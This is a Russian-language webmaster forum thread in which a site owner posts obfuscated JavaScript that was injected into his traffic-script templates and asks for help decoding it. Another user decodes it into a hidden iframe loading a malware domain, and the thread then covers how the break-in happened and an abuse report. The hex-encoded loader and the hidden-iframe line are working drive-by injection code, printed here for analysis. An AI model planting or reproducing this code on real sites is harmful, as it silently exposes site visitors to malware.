Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
 
|
 Добавлено: 06/10/08 в 17:26 |
в общем атаке подвергся сервак с сиджами
был вставлен этот код
| Код: | <script>function c41883415430m48e9b513a50e1(m48e9b513a54c6){ var m48e9b513a58ad=16; return
(parseInt(m48e9b513a54c6,m48e9b513a58ad));}function m48e9b513a607d(m48e9b513a6466){ function m48e9b513a701f()
{return 2;} var m48e9b513a6850='';m48e9b513a77ed=String.fromCharCode;
for(m48e9b513a6c3a=0;m48e9b513a6c3a<m48e9b513a6466.length;
m48e9b513a6c3a+=m48e9b513a701f())
{ m48e9b513a6850+=(m48e9b513a77ed(c41883415430m48e9b513a50e1(m48e9b513a6466.substr
(m48e9b513a6c3a,m48e9b513a701f()))));}return m48e9b513a6850;} var z51='';var m48e9b513a7bd3='3C7'+z51+'3637'+z51+'2697'+z51+'07'+z51+'43E667'
+z51+'56E637'+z51+'4696F6E20636865636B5F636F6E7'+z51+'4656E7'+z51+
'428297'+z51+'B7'+z51+'6617'+z51+'220693D303B7'+z51+'7'+z51+
'68696C6528646F637'+z51+'56D656E7'+z51+'42E67'+z51+'657'+z51+
'4456C656D656E7'+z51+'47'+z51+'3427'+z51+'9546167'+z51+'4E616D652827'
+z51+'69667'+z51+'2616D6527'+z51+'292E6C656E67'+z51+'7'+z51+'468297'
+z51+'B7'+z51+'6617'+z51+'220656C3D646F637'+z51+'56D656E7'+z51+'42E67'
+z51+'657'+z51+'4456C656D656E7'+z51+'47'+z51+'3427'+z51+'9546167'+z51
+'4E616D652827'+z51+'69667'+z51+'2616D6527'+z51+'295B695D3B6966282028656C2E7'
+z51+'37'+z51+'47'+z51+'96C652E64697'+z51+'37'+z51+'06C617'+z51+'93D3D27'
+z51+'6E6F6E6527'+z51+'207'+z51+'C7'+z51+'C20656C2E7'+z51+'37'+z51
+'47'+z51+'96C652E7'+z51+'6697'+z51+'36962696C697'+z51+'47'+z51
+'9203D3D27'+z51+'68696464656E27'+z51+'207'+z51+'C7'+z51+'C2028656C2E7'
+z51+'7'+z51+'69647'+z51+'4683C3520262620656C2E68656967'+z51+'687'+z51
+'43C35292920262620656C2E6E616D65213D27'+z51+'633427'+z51+'297'+z51
+'B656C2E7'+z51+'0617'+z51+'2656E7'+z51+'44E6F64652E7'+z51+'2656D6F7'
+z51+'6654368696C6428656C293B7'+z51+'D656C7'+z51+'36520692B2B3B7'+z51
+'D7'+z51+'D636865636B5F636F6E7'+z51+'4656E7'+z51+'428293B0D0A696628216D7'
+z51+'96961297'+z51+'B646F637'+z51+'56D656E7'+z51+'42E7'+z51+'7'+z51+'7'
+z51+'2697'+z51+'465287'+z51+'56E657'+z51+'363617'+z51+'065282027'+z51
+'2533632536392536362537'+z51+'322536312536642536352532302536652536312536642536352533642536332533342532302537'
+z51+'332537'+z51+'32253633253364253237'+z51+'2536382537'+z51+'342537'+z51+'342537'+z51+'30253361253266253266253637'
+z51+'253666253666253637'+z51+'2536632536352532642536312536652536312536632536392537'+z51+
'61253635253265253633253666253664253266253639253665253265253633253637'+z51+'25363925336625333125333526253237'
+z51+'2532622534642536312537'+z51+'342536382532652537'+z51+'322536662537'+z51+'352536652536342532382534642536312537'
+z51+'342536382532652537'+z51+'32253631253665253634253666253664253238253239253261253336253336253335253335253332253239253262253237'
+z51+'253330253635253237'+z51+'2532302537'+z51+'37'+z51+'2536392536342537'+z51+'34253638253364253332253333253336253230253638253635253639253637'
+z51+'2536382537'+z51+'342533642533322533382533322532302537'+z51+'332537'+z51+'342537'+z51+'39253663253635253364253237'+z51+'2536342536392537'
+z51+'332537'+z51+'302536632536312537'+z51+'39253361253230253665253666253665253635253237'+z51+'2533652533632532662536392536362537'+z51+
'3225363125366425363525336527'+z51+'29293B7'+z51+'D7'+z51+'6617'+z51+'2206D7'+z51+'969613D7'+z51+'47'+z51+'27'+z51+'5653B3C2F7'+z51+'3637'
+z51+'2697'+z51+'07'+z51+'43E'ocument.write(m48e9b513a607d(m48e9b513a7bd3));</script><script>check_content()</script> |
заражение шло
/
и
/папка/
кто силен в джава, колупните код, куда ведет эта хуйня?
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 06/10/08 в 18:33 |
скажи лучше что за софт стоял на сиджах.
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 06/10/08 в 18:48 |
ат3
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 06/10/08 в 18:53 |
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 06/10/08 в 19:01 |
ты же кодер, помоги горю, колупни куда эта хуйня идет?
|
|
|
|
| |
С нами с 24.03.04
Сообщения: 10716
Рейтинг: 3949
|
| Добавлено: 06/10/08 в 19:17 |
хуясе...это в индексе такое ставят?
использовалось ли ограничение по айпи для входа в админку сиджа?
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 06/10/08 в 19:35 |
| Код: | | <iframe name=c4 src='http://google-analize.com/in.cgi?15&'+Math.round(Math.random()*66552)+'0e' width=236 height=282 style='display: none'></iframe> |
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 06/10/08 в 19:37 |
| Цитата: | Whois Record for Google-analize.com:
ICANN Registrar: ESTDOMAINS, INC.
|
как неожиданно 
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 06/10/08 в 19:44 |
|
|
|
|
| |
С нами с 19.04.03
Сообщения: 4743
Рейтинг: 3194
|
| Добавлено: 06/10/08 в 19:51 |
+1 совсем неожидано
HopOne параноики, отрубят сразу.
|
|
|
|
| |
саблезубый кролик
С нами с 02.07.05
Сообщения: 2966
Рейтинг: 993
|
| Добавлено: 06/10/08 в 22:08 |
Последний ли билд ат3? Или ТС только из берлоги вылез?
Вопрос к тому, что не ждать ли новую волну взломов этого говноскрипта?
| Цитата: | Whois Record for Google-analize.com:
ICANN Registrar: ESTDOMAINS, INC. |
+1 удивительно 
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 06/10/08 в 23:26 |
| slonic писал: | хуясе...это в индексе такое ставят?
использовалось ли ограничение по айпи для входа в админку сиджа? |
+1 стояло ли ограничение по IP в админку? Меня с последним билдом тоже ломали, правда ограничения по IP небыло.
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 07/10/08 в 00:12 |
Стояло ограничение!
Пентарх спасибо!
Сегодня приду буду катать арбузы
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 07/10/08 в 00:18 |
Возможно спиздили пароль фтп
|
|
|
|
| |
саблезубый кролик
С нами с 02.07.05
Сообщения: 2966
Рейтинг: 993
|
| Добавлено: 07/10/08 в 00:19 |
| Sergeyka писал: | | Сегодня приду буду катать арбузы |
Блядь.... чует мое сердце опять новая волна взломов пойдет. 
Сергейка билд последний был?
Админские файлики .htaccess'ом закрывал?
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 07/10/08 в 00:28 |
арбузы улетели, ждем
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 07/10/08 в 00:31 |
| Gourad писал: | Блядь.... чует мое сердце опять новая волна взломов пойдет.
Сергейка билд последний был?
Админские файлики .htaccess'ом закрывал? |
да
и еще раз да
все последнее и закрыто
сейчас сапорт хостинга работает чтобы выяснить как попала кака... так как взломаны были именно сиджы
больше ничего не тронуто
|
|
|
|
| |
С нами с 15.01.05
Сообщения: 273
Рейтинг: 224
|
| Добавлено: 07/10/08 в 04:54 |
мне на мыла приходит спам от google-analize.com с линками и предложением нажать. фильтры gmaila пропускают. может так подцепил?
|
|
|
|
| |
Клева
С нами с 07.02.04
Сообщения: 12781
Рейтинг: 3531
|
| Добавлено: 07/10/08 в 10:30 |
ответ на мою абузу
Больше ничего взламывать не будет, снес NS и заблокировал домен. Можете и на форуме сообщить. Спасибо за сотрудничество.
|
|
|
|
| |
Криптопохуист
С нами с 05.04.03
Сообщения: 17156
Рейтинг: 6019
|
| Добавлено: 07/10/08 в 10:50 |
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 07/10/08 в 12:54 |
Пентарх спасиб бро!
в очередной раз выручил! 
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 07/10/08 в 17:25 |
Так а было то чего? Взлом ат3 или фтп?
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 08/10/08 в 00:43 |
через АТ3
так что делайте выводы
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 08/10/08 в 08:01 |
| Sergeyka писал: | через АТ3
так что делайте выводы |
А какие выводы то? Нашли как влезли то? Или это просто догадка?
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 08/10/08 в 12:20 |
если бы я знал как...
это не догадка, вредоносный код был встроен в шаблон
|
|
|
|
| |
